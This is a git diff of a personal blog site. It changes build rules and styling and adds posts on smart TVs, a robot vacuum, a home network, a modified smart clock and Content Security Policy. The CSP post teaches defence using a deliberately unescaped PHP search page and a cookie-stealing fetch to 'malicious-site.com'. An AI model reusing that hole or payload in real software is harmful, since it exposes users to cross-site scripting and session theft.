diff --git a/Makefile b/Makefile
index da9f321..d6c3b9a 100644
--- a/Makefile
+++ b/Makefile
@@ -65,6 +65,10 @@ public/%/index.html: content/%.md tmp/templates/taglist.html
 mkdir -p $(@D)
 pandoc --template=templates/blog.html -f markdown -t html5 -M comments $< > $@

+public/startpage/index.html: templates/startpage.html
+ mkdir -p $(@D)
+ cp $< $@
+
 public/blog/%/index.gmi: content/blog/*-%.md
 mkdir -p $(@D)
 echo -n "# " > $@
@@ -72,7 +76,14 @@ public/blog/%/index.gmi: content/blog/*-%.md
 echo "" >> $@
 md2gemini -f -l paragraph $< >> $@

-public/card:
+public/%/index.gmi: content/%.md
+ mkdir -p $(@D)
+ echo -n "# " > $@
+ grep 'title: ' $< | cut -d ' ' -f 2- >> $@
+ echo "" >> $@
+ md2gemini -f -l paragraph $< >> $@
+
+public/card: content/card.curl
 content/card.curl > $@

 ###########
@@ -83,9 +94,9 @@ tags: $(foreach tag, $(ALLTAGS), public/tag/$(shell echo $(tag) | tr 'A-Z' 'a-z'
 blogs: $(foreach blog, $(ALLBLOGS), public/blog/$(shell echo $(blog) | tr 'A-Z' 'a-z')/index.html ) $(foreach blog, $(ALLBLOGS), public/blog/$(shell echo $(blog) | tr 'A-Z' 'a-z')/index.gmi )

-standalone: $(foreach page, $(STANDALONE), public/$(page)/index.html )
+standalone: $(foreach page, $(STANDALONE), public/$(page)/index.html public/$(page)/index.gmi ) public/startpage/index.html

-all: tags blogs standalone public/index.html public/feed.rss public/card
+all: tags blogs standalone public/index.html public/index.gmi public/feed.rss public/card

 push-blog:
 rsync -azvhP ./public/ generalPurpose:docker/jonathanh/public
diff --git a/assets/css/main.less b/assets/css/main.less
index 8c28455..040e4f4 100644
--- a/assets/css/main.less
+++ b/assets/css/main.less
@@ -107,6 +107,9 @@ main{
 max-width: 95%;
 @media (min-width: 50em){
 max-width: 70%;
+ &.wide{
+ max-width: 95%;
+ }
 }
 }
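Review bot: The new `public/%/index.gmi` recipe assembles `$@` with `>` followed by several `>>` steps, so if `md2gemini` (or the `grep | cut` pipeline, whose failure is masked by the pipe) fails, the target is left half-written with a fresh mtime and the next `make` considers it up to date; adding `.DELETE_ON_ERROR:` near the top of the Makefile (outside this hunk), or writing to `$@.tmp` and moving it into place only after the last step succeeds, avoids shipping a stale or truncated page. The same weakness exists in the pre-existing `public/blog/%/index.gmi` rule whose tail forms this hunk's leading context. The five recipe lines are also a verbatim copy of that rule's recipe; a canned recipe (`define gmi_page` … `endef`, expanded as `$(gmi_page)` in both rules) would keep the two from drifting apart. Finally, `grep 'title: ' $<` is unanchored and matches any body line containing that string, so a page that mentions `title: ` in its text gets extra heading lines; `grep -m 1 '^title: ' $< | cut -d ' ' -f 2- >> $@` restricts it to the first front-matter key.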
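Review bot: `all` now depends on `public/index.gmi`, but no rule producing that file is visible in the diff: the new pattern `public/%/index.gmi: content/%.md` only matches paths with a directory component between `public/` and `index.gmi`, so it cannot build the top-level file. Unless an explicit `public/index.gmi` rule exists elsewhere in the Makefile (the rule for `public/index.html` is also outside the hunk, so this is inferred), `make all` will stop with "No rule to make target 'public/index.gmi'". If the Gemini front page is derived from the same source as `public/index.html`, an explicit rule for `public/index.gmi` placed next to that one closes the gap. Separately, `standalone` and `all` are not file targets and should be listed in a `.PHONY:` declaration if they are not already — that line is not visible here.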
@@ -132,16 +135,34 @@ li{
 // overflow: auto;
 //}

+.col-container{
+ display: flex;
+ flex-direction: row;
+ flex-wrap: wrap;
+ h1{
+ width: 100%;
+ }
+}
+
 article{
 background-color: @gb-dm-bg1;
 margin: 1em;
 padding: 1em;
 border-radius: 1em;
+ width: 100%;
+ &.col{
+ @media (min-width: 50em){
+ width: 25%;
+ }
+ }
 }

 footer{
 display: flex;
- flex-direction: row;
+ flex-direction: column;
+ @media (min-width: 50em){
+ flex-direction: row;
+ }
 justify-content: space-between;
 background-color: @gb-dm-bg3;
 padding: 0.5em;
diff --git a/assets/lenovo-clock/microphone-board.jpg b/assets/lenovo-clock/microphone-board.jpg
new file mode 100644
index 0000000..92bfda9
Binary files /dev/null and b/assets/lenovo-clock/microphone-board.jpg differ
diff --git a/assets/lenovo-clock/screen-screws.jpg b/assets/lenovo-clock/screen-screws.jpg
new file mode 100644
index 0000000..5678363
Binary files /dev/null and b/assets/lenovo-clock/screen-screws.jpg differ
diff --git a/assets/lenovo-clock/screenshot.png b/assets/lenovo-clock/screenshot.png
new file mode 100644
index 0000000..69074bc
Binary files /dev/null and b/assets/lenovo-clock/screenshot.png differ
diff --git a/assets/van/24cf7a6dbc63425b9de9439f850e1897.jpg b/assets/van/24cf7a6dbc63425b9de9439f850e1897.jpg
new file mode 100644
index 0000000..42bcdf1
Binary files /dev/null and b/assets/van/24cf7a6dbc63425b9de9439f850e1897.jpg differ
diff --git a/assets/van/68d3da94e7944b3ead7b0f400bd79909.jpg b/assets/van/68d3da94e7944b3ead7b0f400bd79909.jpg
new file mode 100644
index 0000000..a80781a
Binary files /dev/null and b/assets/van/68d3da94e7944b3ead7b0f400bd79909.jpg differ
diff --git a/content/blog/017-why-cant-i-buy-a-dumb-tv.md b/content/blog/017-why-cant-i-buy-a-dumb-tv.md
new file mode 100644
index 0000000..489bdd3
--- /dev/null
+++ b/content/blog/017-why-cant-i-buy-a-dumb-tv.md
@@ -0,0 +1,116 @@ +--- +title: Why can't I buy a dumb TV? +date: 2022-12-31 +tags: + - Privacy +description: Dumb TVs don't appear to be a thing anymore. I wonder why? +--- + +Our old TV is showing it's age a bit. It's an old Samsung. About 30" and 1080p. +It works fine, but certainly isn't what you'd call modern. I think it dates from +around 2010. + +I thought I'd look and see how much it would cost to replace it -- allowing me to +use it as a monitor. I spend the majority of my time in a terminal, I don't game +and as such 4k, high refresh rate, wide screen monitors are of little interest +to me. What is of interest to me is how many terminal windows I can tile and +still use. + +Anyway, I went to various sites and navigated to TVs. What I found surprised me +a little: no dumb TVs. None at all. There were smart, 4k 55" TVs for under £400, +but nothing without "smart features". + +Most people assume that if I don't like something, it's because of privacy +concerns or similar. While this is partly true for TVs, it's not my main +dislike. + +Smart TVs need to be maintained by the manufacturer when it is in their interest +not to do so. Think about software updates. Is Samsung / LG / Sony / Philips going to +be putting updates out for your TV in 10 or 15 years? If you think they might, +take a look at how phones have gone. I'll use Samsung as an example: they offer +3 years worth of feature updates and 4 years worth of security updates -- that is +for their flagships. Lower end phones won't even get that. This means that after +4 years, your Samsung flagship phone will not be patched for security issues. + +Why would they do any different for TVs? Many smart TVs even run Android -- a +variation on the system used on most smartphones. + +That just relates to the manufacturer maintaining the device. Let alone the apps +who can also [decide to stop supporting the TV](https://9to5google.com/2019/07/26/sony-tv-amazon-prime-video-september/). 
+ +It is bad enough spending hundreds (or thousands) of pounds on a phone every few +years, I don't want to do the same for a TV. + +"What about apps?", you might ask. This is a non issue. I can buy a 4k fire +stick for less than £50. That is without offers. I've seen them sub-£30 on prime +day. If that only lasts 3 years, I can swap that for a new one at the time, +rather than swapping out my whole TV. I don't love the idea of replacing a set +top box every few years, but I like that idea far more than replacing a whole +TV. + +Modern versions of HDMI will happily support your HDR, single remote and +surround sound needs. + +So, planned obsolescence is one reason, but I don't think it is the whole story. + +I'm sure it won't come as a surprise to anyone reading this blog that data +collection is a huge business these days. Targeting advertising allows companies +to charge exuberant prices for well placed ads. The amount they can charge +correlates nicely with the amount of data they can collect. It is no coincidence +that the largest advertising companies (Google and ~~Facebook~~ Meta) are also +two of the worst offenders for hoarding information. + +TV manufacturers realised that they can make more money selling adverts than +they can selling TVs. The more TVs they sell, the more they can charge for +advertising. This is not just me and my tin foil hat. Vizio went public a year +or so ago and, as a result, had to publish their financials. They made over +[twice as much money selling ads as they made from TV sales](https://www.theverge.com/2021/11/10/22773073/vizio-acr-advertising-inscape-data-privacy-q3-2021). + +This isn't the post to go into why I think it is important to protect your data. +If you're reading my blog, you probably already have some idea. However, it +seems that just as most of our phones, smart speakers and watches spy on us, our +TVs are trying to do the same. Maybe you don't care if big companies know what +you're watching. 
That is your decision, but it is a decision you should make -- +not one that you should be compelled into. + +It seems clear to me that planned obsolescence isn't the only factor at play +here. Sure, they want to sell you a TV every few years, but they also want to +harvest as much data as possible in order to sell ads. I don't want this. + +The question then becomes, what can we do about it? Unfortunately, I haven't +found a good answer to this but here are some thoughts. + +The first, and perhaps most obvious answer, is to buy a smart TV and just not +connect it to the network. With this you get the advantage of (comparably) cheap +units, and don't have the risk of data harvesting. A slight variation on this +might be isolating the TV or blocking access via a firewall rule. This doesn't, +however, mitigate the issue of security updates. Additionally, I'm told that +many TVs will either not work at all, or continuously prompt you to connect them +to the internet. I recently tried to use a Fire TV stick on a network without +internet connectivity, in order to watch content stored on a local server with +Jellyfin. The process was a long way from ideal. The home screen (where you +would normally select the app such as Jellyfin) was replaced entirely with a +network error and a prompt to go to network settings. Even apps that don't +require an internet connection were unavailable. + +It was possible to launch Jellyfin by going `Settings` -> `Applications` -> +`Manage Installed Applications` -> `Jellyfin` -> `Launch Application`, but that +is not a process I want to make every time I turn on the TV, and certainly not a +solution that would get wife-approval. I have no idea if I would have similar +issues with other devices, and buying a smart TV to test that is not +particularly palatable. + +Another option might be using a non-tv monitor as a TV. You can buy large +computer monitors or displays meant for digital signage. 
Computer monitors of +this size [are +expensive](https://www.amazon.co.uk/Philips-558M1RY-Monitor-Ambiglow-FreeSync/dp/B086X4J9KG/ref=sr_1_3?keywords=65+inch+monitor+4k&qid=1672490924&sprefix=65+inch+monitor%2Caps%2C292&sr=8-3). +Digital signage signs are also expensive, but do tend to come with the advantage +that they are designed to be on all the time. Although I couldn't find much in +the way of data, I suspect this would mean they would last longer. However, +again, they are a lot more expensive than a consumer-grade smart TV. + +My plan is to do some more research and try and find a smart tv that can be used +without constant nags when not connected to the internet. If any of you know of +such a device, or have any other ideas, let me know in the comments below. + + diff --git a/content/blog/018-i-got-a-robot-vacuum.md b/content/blog/018-i-got-a-robot-vacuum.md new file mode 100644 index 0000000..2703c01 --- /dev/null +++ b/content/blog/018-i-got-a-robot-vacuum.md 
@@ -0,0 +1,71 @@ +--- +title: I Got a Robot Vacuum +date: 2022-12-31 +tags: + - Privacy + - Home Assistant +description: I recently bought a Robot vacuum. I have been amazed how good it is. +--- + +So, you have probably seen or heard about robot vacuums. I had, although +honestly thought they were a bit of a gimmick. However, a few people I know have +them and sung their praises so I thought I'd see what the fuss was about. + +I did some research and settled on the [Dreame L10 Pro](https://amzn.to/3GacxLz) +([Non-Associates +link](https://www.amazon.co.uk/Dreame-Dual-Line-Navigation-Multi-Level-Compatible/dp/B09YQ3VF3J/?th=1)). +This was in no small part because it is known to work with +[Valetudo](https://valetudo.cloud/) which allows for fully local control of the +robot. As well as a very usable web interface, it also provides MQTT control +which I use for [Home Assistant](/tag/home_assistant/) control. + +It is fair to say that my expectations have been shattered by this device. I +expected it to do a reasonable job, but that I would probably have to do a +"proper" hoover once a week or so. That has not been the case. I have not had to +manually hoover the floors at all since setting it up. I have been especially +surprised by this as we have a dog who malts. + +I have the vacuum set to vacuum our daytime living areas (lounge, kitchen, hall, +study) every morning at 1am. I did not expect the quality of life improvement +that we got from waking up every morning to a vacuumed house. Our bedroom is +then vacuumed during the day while we work. Apart from emptying the vacuum's +dustbin, this is entirely automatic. + +The vacuum I have has a detachable cloth and water tank that it can drag behind +it and keep wet. I mostly got the device for its vacuum capabilities. However, +the addition of the mop is nice. This, too, exceeded my expectations; although +not to the same extent as the vacuum. 
It is nice to have, but I wouldn't buy +this particular robot for its mopping capabilities. We tend to attach this mop +and manually instruct the vacuum to mop various rooms when we go out. + +## Any Cons? + +Although this device has been an overwhelming positive in our life, it may not +be for everyone. + +We have hard floors throughout our flat. This obviously makes vacuuming and +mopping easier for the robot. We do have a thick rug which it can struggle with +a little. However, I have taken the robot to our parents' houses who have carpet +and it has tackled even quite thick carpets without issue. If you have a lot of +very thick rugs, you may want to do a bit more research into robots that can +deal with them. + +Also, the dustbin in the vacuum is quite small. I tend to empty it every other +day. Paying more can get you features such as auto-emptying dustbins which the +robot I got doesn't have. + +We live in a flat, so we don't have stairs to contend with. We are due to move +very soon into a house. My long term plan is to buy a second robot, in order to +have one up stairs and one downstairs. This (obviously) makes a fully automated +vacuuming setup significantly more expensive. However, the fact that I am +planning this hopefully demonstrates how happy I am with this vacuum. + +## Home Assistant + +As mentioned, Valetudo allows me to control my robot entirely locally. My home +automation platform of choice is Home Assistant which is [supported by +Valetudo](https://valetudo.cloud/pages/integrations/home-assistant-integration.html). + +With my smart light switches, it allows me to do things like push and hold the +light switch in order to instruct the vacuum to come and hoover the room I'm in. +It can also stop the vacuum from vacuuming every day while we are on holiday. diff --git a/content/blog/019-my-new-home-network.md b/content/blog/019-my-new-home-network.md new file mode 100644 index 0000000..d416754 --- /dev/null 
+++ b/content/blog/019-my-new-home-network.md 
@@ -0,0 +1,162 @@ +--- +title: My New Home - Network +date: 2023-02-08 +tags: + - Privacy + - My New Home +description: > + I recently bought a new House. In this post, I discuss my network setup as + part of a series of posts about the setup. +--- + +So, we have finally moved into our new home. The buying process took far too +long, I am sick to death of dealing with solicitors, but we are now in. I hope +this will become a series of blog posts in which I detail the setup process. +This particular post will be the network. + +My initial intention had been to buy some land and build a house. However, the +process of doing so in the UK was ... annoying, so instead we went for a new +build. We found the property early enough in the build process that we were able +to make various requests. One of which was for the electrician to run Cat-6 +ethernet cable throughout the house before the walls were plastered. The cables +all run into our under-stairs cupboard which I managed to convince my wife to +give me as a server room. + +The majority of our rooms have 2 ethernet sockets in opposite corners. Our +lounge has 4, one in each corner. Our hall and landing both have celling mounted +ports for access points. I think this is probably more than we need, but at the +time we didn't know how we'd lay the rooms out, so we put in more than we +thought we'd need. I think this was a good choice. Running ethernet is much +easier when you don't have plaster to contend with. And they are just sockets on +the walls -- they are no uglier than mains, telephone or coax sockets. + +## Network Gear + +In terms of the network gear, I decided to take the plunge and try TP-Links +Omada line. I think it is fair to say that in the pro-sumer arena, Ubiquity are +the most popular. However, they are also expensive. I watched a lot of YouTube +and decided that TP Link's product catered for my needs. 
+ +I bought: + +* [A Router / firewall](https://amzn.to/3HwPACO) ([Non-Associates Link](https://www.amazon.co.uk/gp/product/B08SWR1K56/)) +* [A Switch](https://amzn.to/3I1rB07) ([Non-Associates Link](https://www.amazon.co.uk/gp/product/B08W4PM24H/)) +* [An Access Point](https://amzn.to/3RCFkxw) ([Non-Associates Link](https://www.amazon.co.uk/gp/product/B09ZF7HPFB/)) + +I won't go into too much detail on the individual devices I got as copying me is +a pretty bad idea. You want to make the decision based on the size of your +network, the speeds you need and the sorts of devices you want to attach. + +## Network Configuration + +I run the TP Link Omada Controller in a Docker container on my home server. I +have had no issues with it at all so far. + +In terms of the software itself, I would say that it's not quite on a par with +Ubiquity's product, however, it is more than sufficient for my needs and I would +think more than sufficient for most home users and small / medium businesses. + +The only area I found it to be a little lacking was the firewall configuration. +However, before I explain that, it would be helpful for me to explain the VLANs +I have on my network. In case you don't know, a VLAN is a virtual network. It is +useful for categorising and segregating devices. I have seen many examples +across the internet of people who setup tens of VLANs for their home network. +However, I think any security gains you may get from that are outweighed by the +added complexity maintaining it. I have opted for two VLANs. + +My first VLAN is for trusted devices. Trusted devices are my computers, my +wife's computers, our phones and my server. These are able to communicate +with each other and the internet. + +My second VLAN is for smart devices. These are devices that have no business +talking to each other or the internet. The only device they can communicate with +is my server running Home Assistant, an NTP server and a DNS server. 
+ +This can all be achieved easily with the Omada software. Where it is lacking is +in its inability to set up stateful firewall rules. I would like to configure +the firewall so that devices on my trusted network can communicate with devices +on the smart VLAN, and the smart devices should be able to reply. Meaning, from +my laptop, I cannot SSH into [my vacuum](/blog/i-got-a-robot-vacuum/) because +that requires 2 way communication. There is talk [on +Reddit](https://libreddit.kavin.rocks/r/HomeNetworking/comments/mrxsbg/tplink_omada_switch_acls_arent_stateful/) +that future firmware may support this, but at the moment it doesn't. I have got +around this by using my server as a jump box to SSH from as smart devices are +able to connect to this, although I'd prefer a stateful firewall solution. + +I am also not able to force all DNS requests to my DNS server. On some router / +firewall solutions, you can force all outbound traffic on port 53 (DNS) to a +particular device. I have to rely on devices honouring the server specified via +DHCP. However, they seem to be doing this. They are unable to communicate with +any other servers so even if they are only honouring my choices because they +have no choice, I don't really care. + +## NTP + +One of the issues I overlooked when planning my network setup was that of the +Network Time Protocol (NTP). I have Chrony running on my server, but many +devices don't allow you to specify an NTP server. Instead, they just silently +fail, and leave you scratching your head whilst trying to correlate times in log +files. A particularly annoying case of this had a device default to a date in +January 2022. Whilst debugging an issue, it was January 2023 and I completely +missed the fact that it was a year out for far too long. + +It should be possible to configure an NTP server via DHCP. However, the Omada +software doesn't [appear to support +it](https://community.tp-link.com/en/business/forum/topic/256680). 
Eventually, I +might allow my Pi Hole to manage IP assignment which would allow me to configure +the appropriate DHCP options, although that would still be reliant on devices +obeying it. + +For now, I have pointed the domains I saw being used at my server, which appears +to have worked. + +## Network Connection + +Another issue I came across is that some mobile apps for self hosted programs +don't work without an internet connection. I [raised an +issue](https://github.com/advplyr/audiobookshelf-app/issues/566) for +Audiobookshelf. The owner responded quickly and after a few screenshots +acknowledged the bug. This is not supposed to be a knock on the app -- I have +been hugely impressed by the speed of responses I've had from the team who work +on it. It is instead supposed to highlight the fact that many tools are not +tested against the sort of non-standard setup I have here. As a result, I am +going to run into issues that I wasn't expecting. + +In the case of Audiobookshelf, it looks like one of its libraries checks for +internet connectivity rather than network connectivity. After checking my +pihole's logs, it turns out that Android devices make regular (unencrypted) +requests to . This is used to identify +captive portals as well as verify internet connectivity. Fortunately for me, +being unencrypted, I can host a simple webserver and point that domain at it on +my network. So that's what I did. The relevant NGINX config is below: + +```nginx +server { + listen 80; + listen [::]:80; + + server_name connectivitycheck.gstatic.com; + + location / { + return 204; + } +} +``` + +After this, the app started working as expected. + +## WPS + +WPS is a method of connecting to a network without having to enter a password. +It generally involves pushing a button on your access point and a button on your +phone / device then "magically" the device is on your network. This method of +connection has been shown to have several security weaknesses. 
Many modern +solutions, including Omada and Ubiquiti have stopped providing this as an +option. + +I approve of this decision, it is something I would have disabled if it had been +present. However, my printer has no other way of connecting to the network. No +ethernet and no way to enter a password. I think I'll probably have to dig out +an old router that does support WPS and hope that after connecting, the printer +will have a web interface that allows me to change the network configuration. If +not, I may have to just plug a small SBC into it and run a cups server on that. diff --git a/content/blog/020-my-new-home-alarm-clock.md b/content/blog/020-my-new-home-alarm-clock.md new file mode 100644 index 0000000..dbd7a73 --- /dev/null +++ b/content/blog/020-my-new-home-alarm-clock.md 
@@ -0,0 +1,209 @@ +--- +title: My New Home - Alarm Clock +date: 2023-02-26 +tags: + - Privacy + - My New Home + - Home Assistant +description: > + Part 2 of my new home setup. I discuss a Lenovo clock I got. +--- + +I recently picked up a [Lenovo Clock +2](https://www.lenovo.com/gb/en/p/smart-devices/smart-home/smart-home-series/lenovo-smart-clock-2/wmd00000485) +on offer. I got it for around £25. I knew it ran Android and thought +that for that price, it was worth picking one up to mess with. + +After a couple of searches, I found a guide to installing other android apps on +it. + + + +Once I'd installed a custom launcher, I was able to get into the android +settings and start disabling apps. I disabled the vast majority of them although +I was unable to disable the Google Assistant app. At the time of writing, there +doesn't appear to be a reliable root method for the device. There is also no USB +interface so even an adb shell was unachievable. + +## Dealing with the microphones + +For me to have a device like this plugged in, in my house, I want to be +absolutely certain that it isn't sending any data back to its Google mothership. + +The device has a toggle on the back that switches the microphone off. This is a +software toggle. This has 2 issues. Firstly, it could conceivably be overwritten +in software. Second, it puts an icon on the screen to tell you that it's muted. +This takes up a significant part of an already small screen. So, I took the +device apart to see if the microphones were removable. + +I should probably make the point here that the following procedure will void any +warranties you may have on the device. Also, this is not advice, I am not +responsible if you break it, or hurt yourself or anything else. + +Disassembly was surprisingly easy. After unsticking the non-slip +ring on the bottom, there were four screws to undo -- one in each corner. After +doing this, the bottom of the device can be prized off. 
There are a few plastic +clips and a ribbon cable to be aware of, but if you have ever disasembed +anything before, it should be quite easy. + +![Bottom off, screen screws circled](/assets/lenovo-clock/screen-screws.jpg) + +This then exposes a couple of additional screws which hold the screen in place, +highlighted above. The screen can then be removed, exposing a circuit board +containing the microphones and the ambient light sensor. + +![Screen removed, microphones exposed](/assets/lenovo-clock/microphone-board.jpg) + +This can be removed. It is friction fit and there is another ribbon cable. +Remove the ribbon cable and the microphones and sensor can be removed. Put +everything back together and plug it in - there you go. You have a device that +**cannot** listen to you. + +This may be overkill, this device is going on a VLAN that doesn't have internet +access so there should be no way for it to talk back anyway. However, defence in +depth is the best option in my opinion. If I connect it to the wrong network or +misconfigure my firewall, I don't want it sending any information back to +anyone. + +## Home Assistant Setup + +Next step, for me, was to set it up as a Home Assistant screen. I was able to +install [WallPanel](https://github.com/thecowan/wallpanel-android) which is a +browser that can be controlled remotely via an HTTP API or MQTT. It is similar +to the concept of [FullyKioskBrowser](https://www.fully-kiosk.com/). It is open +source though and doesn't lock features behind a paywall. I've used +FullyKioskBrowser before, and it is a very competent piece of software, but I +felt like trying something new. + +I created a simple dashboard in Home Assistant, and set the start URL for +wallpanel to that dashboard. The screen is small, so you don't really want lots +of information on there. I have a clock, an alarm clock toggle, a radio +station selection (more on that later) and a few buttons. 
+ +The next part of the setup was [Browser +Mod](https://github.com/thomasloven/hass-browser_mod). This allows you to +control a browser window through Home Assistant, adding the ability to use it as +a media player or hide the navigation elements that are usually present. This +allowed me to play (local) audio on the clock. It also allows me to remove the +sidebar and top bar on the device to reclaim a little screen space. + +### Radio + +One of the side effects of not allowing the clock to access the internet means +it can't play internet radio (hopefully that isn't a surprise to anyone). +However, I like to be woken up to the radio. It is probably possible to add some +radio IP addresses to a whitelist. However, to make my life easier, I decided to +proxy any radio stations through my home server, which does have internet +access and the smart clock can communicate with. + +For the most part this was pretty simple. I found stream URLs for a couple of +radio stations. Here is the nginx configuration for Classic FM and Absolute +Radio. + +```nginx +perl_set $unix_timestamp 'sub { + time(); +}'; + +server { + listen 443 ssl; + listen [::]:443 ssl; + + ssl_certificate /etc/nginx/certs/fullchain1.pem; + ssl_certificate_key /etc/nginx/certs/privkey1.pem; + + server_name radio.my.domain + include /etc/nginx/conf.d/acl.inc; + + location /classicfm { + proxy_pass http://icecast.thisisdax.com/ClassicFMMP3; + } + + location /absolute { + resolver 1.1.1.1; + proxy_pass http://edge-bauerabsolute-05-gos2.sharp-stream.com/absoluteradiohigh.aac?aw_0_1st.skey=${unix_timestamp}&aw_0_1st.playerid=BMUK_RPi; + } +} +``` + +I'm sure you can see how this can be extended for more stations. The only thing +that may not be obvious is the `unix_timestamp` variable in the absolute radio +url. I don't know why it is necessary, but for some reason it is, so I define a +variable in the `perl_set` block at the top. 
+ +So, with this, I can run + +```bash +mpv https://radio.my.domain/classicfm +``` + +And ClassicFM will play. With BrowserMod set up for the device, I can then run +the service: + +```yaml +service: media_player.play_media +target: + entity_id: media_player.alarm_clock +data: + media_content_type: music + media_content_id: "https://radio.my.domain/classicfm" +``` + +I would like to be able to add these URLs to the media library, however I +haven't yet found a way to do that. If anyone knows of a way, please let me +know. However, for now I created a text helper with the following: + +* Off +* Absolute Radio +* Classic FM + +I then created an automation: + +```yaml +- alias: Clock Radio + trigger: + - platform: state + entity_id: + - input_select.bedroom_radio + condition: [] + action: + - if: + - condition: state + entity_id: input_select.radio + state: Classic FM + then: + - service: media_player.play_media + data: + media_content_id: https://radio.hodgson.one/classicfm + media_content_type: music + target: + entity_id: media_player.alarm_clock + - if: + - condition: state + entity_id: input_select.radio + state: Absolute Radio + then: + - service: media_player.play_media + data: + media_content_id: https://radio.hodgson.one/absolute + media_content_type: music + target: + entity_id: media_player.alarm_clock + - if: + - condition: state + entity_id: input_select.radio + state: 'Off' + then: + - service: media_player.media_stop + data: {} + target: + entity_id: media_player.alarm_clock + mode: single +``` + +The last step is an automation for my alarm clock. It simply sets the input +select we set up to ClassicFM. This then plays on the speaker. + +The result is below: + +![Finished Clock](../../assets/lenovo-clock/screenshot.png) diff --git a/content/blog/021-csp.md b/content/blog/021-csp.md new file mode 100644 index 0000000..b52700d --- /dev/null +++ b/content/blog/021-csp.md 
@@ -0,0 +1,360 @@
+---
+title: Setting a good Content Security Policy
+date: 2024-08-22
+tags:
+ - Security
+ - Websites
+description: >
+ Setting a good CSP can be hard. Here I go through what it is, and how to set
+ it up well.
+---
+
+The Content Security Policy (CSP) is a powerful security feature that helps
+protect your website from cross-site scripting (XSS) attacks and other types of
+code injection vulnerabilities. There are some directives that do other things,
+but the bulk of this blog post will cover using the `fetch-directives`, or the
+elements of the CSP that allow you to specify a allow-list of approved sources
+from which resources This helps prevent malicious code from being executed on
+your site.
+
+To implement CSP, you need to set the Content-Security-Policy HTTP header on
+your web server. Here's an example of what a basic CSP header might look like:
+
+```
+Content-Security-Policy: default-src 'self'; script-src 'self' https://example.com
+```
+
+Let's break down the different directives in this example:
+
+- `default-src 'self'`: This sets the default source for all resource types to the same origin (i.e., your own website). This is a good baseline to start with.
+- `script-src 'self' https://example.com`: This specifies that scripts can only be loaded from your own site (`'self'`) and the `https://example.com` domain. This helps prevent the execution of any unauthorized scripts.
+
+It is worth noting that default-src applies to all source types that haven't
+been explicitly specified. Any sources that are explicitly specified overwrite
+then default-src, they are not added to it.
+
+Consider the following:
+
+```
+Content-Security-Policy: default-src 'self'; script-src https://example.com
+```
+
+This will not allow scripts to sourced from the current origin, despite `'self'`
+being in the `default-src` directive.
+
+You can further customize the CSP header to suit your website's specific needs.
+For example, you might want to allow images to be loaded from a content delivery
+network (CDN), or allow fonts from a third-party font provider. Here's an
+example of a more comprehensive CSP header:
+
+```
+Content-Security-Policy: default-src 'self'; script-src 'self' https://example.com; style-src 'self' https://cdn.example.com; img-src 'self' https://cdn.example.com; font-src 'self' https://fonts.gstatic.com
+```
+
+In this example, we've added directives for styles, images, and fonts, allowing
+them to be loaded from specific approved sources.
+
+It's important to note that implementing CSP is an iterative process. You'll
+likely need to adjust your policy as you add new features and functionality to
+your website. A good approach is to start with a strict policy and gradually
+loosen it as needed, while keeping security as the top priority.
+
+Whilst testing, it may be useful to use the
+[content-security-policy-report-only](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-Only)
+header. Whilst it doesn't provide any protection, it also won't break an
+existing site as it only reports report violations, rather than blocking them.
+
+## Why Bother
+
+So, we have an idea of how to set a CSP, but not why we may want to. The main
+reason to have a strong CSP set is to protect against injection attacks. The
+most common of these is cross-site-scripting, where JavaScript is injected;
+although other types do exist when injecting malicious css (style-injection), or
+images (image-injection). The example below explains one way in which script
+injection, or cross-site-scripting, is bad.
+
+Take the following simple PHP search page:
+
+```php
+
+
+
+ Vulnerable Search Page
+
+
+

Search Our Website

+
+ Search: + +
+
+ You searched for: " . $_GET['search'] . "";
+ }
+
+ //Some logic to display search results
+ ?>
+
+
+```
+
+The important factor here is that the users search query (`$_GET['search']`) is
+output verbatim, without encoding or sanitising it.
+
+If I perform a search for ``, the following h2 tag will be sent to the browser:
+
+```
+

You searched for:

+```
+
+The browser will see that, and interpret the script tag as a script it should
+execute. `alert(1)` is a relatively benign function that we often use to
+demonstrate the issue exists, without causing significant issues to the site.
+However, now imagine changing `alert(1)` for
+`fetch('https://malicious-site.com?c=' + document.cookie)`.
+
+Now my cookies have been sent to a malicious site for the owner to do with as
+they please.
+
+The content-security-policy can be use to add a layer of protection here. When
+set strictly, the browser can "know" that the script tag in the h1 tag isn't on
+a pre-approved list, so the browser won't execute it.
+
+## Potential Mistakes
+
+So, now we know why you might want a CSP, and how to set one, we'll look at some
+of the most common mistakes I see people make.
+
+### `'unsafe-inline'` source
+
+This source is very frequently added to a CSP, without realising it severely
+limits the protection that it can offer. Most online generators will add it as,
+in their current setup, most sites use inline resources. An inline resource is,
+as the name suggests, most script or style resources that are not external.
+
+So,
+
+```html
+
+
+
+
+
+
+
+```
+
+The problem here is that, more often than not, inline JS is the easiest way to
+achieve XSS. The search example we used earlier added an inline script tag, so
+a CSP with unsafe-inline would not have prevented it from executing.
+
+There are a number of better options here. First is externalising scripts. So,
+moving inline JS into an external file and adding it to the allow-list.
+
+If that isn't possible, or practical, another option is to use the special
+`-` sources, or `nonce-` sources. These allow you to add
+specific inline scripts to the allow-list, without allowing all inline scripts.
+Just make sure not to fall into the [potential mistakes with nonce
+sources](#nonce-source).
+
+### `'unsafe-eval'` source
+
+The unsafe-eval source is only relevant for JavaScript, and allows scripts to
+run `eval()`, and a couple of other similar functions. The most common use for
+eval I've seen is when targeting older JS environments that not have native
+JSON support as an alternative to `JSON.parse()`.
+
+So, consider the following:
+
+```js
+const jsonString = document.getElementById('someTextArea').value;
+const jsonObject = eval(jsonString2 );
+```
+
+If the contents of the text area were:
+
+```json
+{
+ "name": "Jane Doe",
+ "age": 25
+}
+```
+
+then:
+
+```
+console.log(jsonObject.name); // Output: "Jane Doe"
+```
+
+However, if the contents of the text area were `alert(1)`, then we are in the
+situation again whereby unsafe JavaScript is being executed. Unfortunately,
+there are a lot of different uses of eval, so a "fix" for all of them is
+unlikely. However, most modern frameworks do not need to use eval, so disabling
+it is preferable if possible.
+
+### Nonce source
+
+The nonce source allows site maintainers to allow some inline sources to be
+included. We've been using JavaScript as examples, so I will continue to do so,
+but note that this is also relevant for CSS.
+
+```
+Content-Security-Policy: script-src 'nonce-uph5Fai4'
+```
+
+```
+
+
+
+ Example
+
+
+
+
+

Our Website

+
+
+```
+
+For the nonce source to be effective, it must be unpractical for malicious actor
+to guess the nonce. In practice, this generally means using a long and random
+string of characters for each response. The nonce should not be re-used. If a
+malicious actor can guess what a nonce is, then they can simply add the
+attribute to their injected payload.
+
+### JSONP Sources
+
+JSONP (JSON with Padding) is a technique used to bypass the same-origin policy,
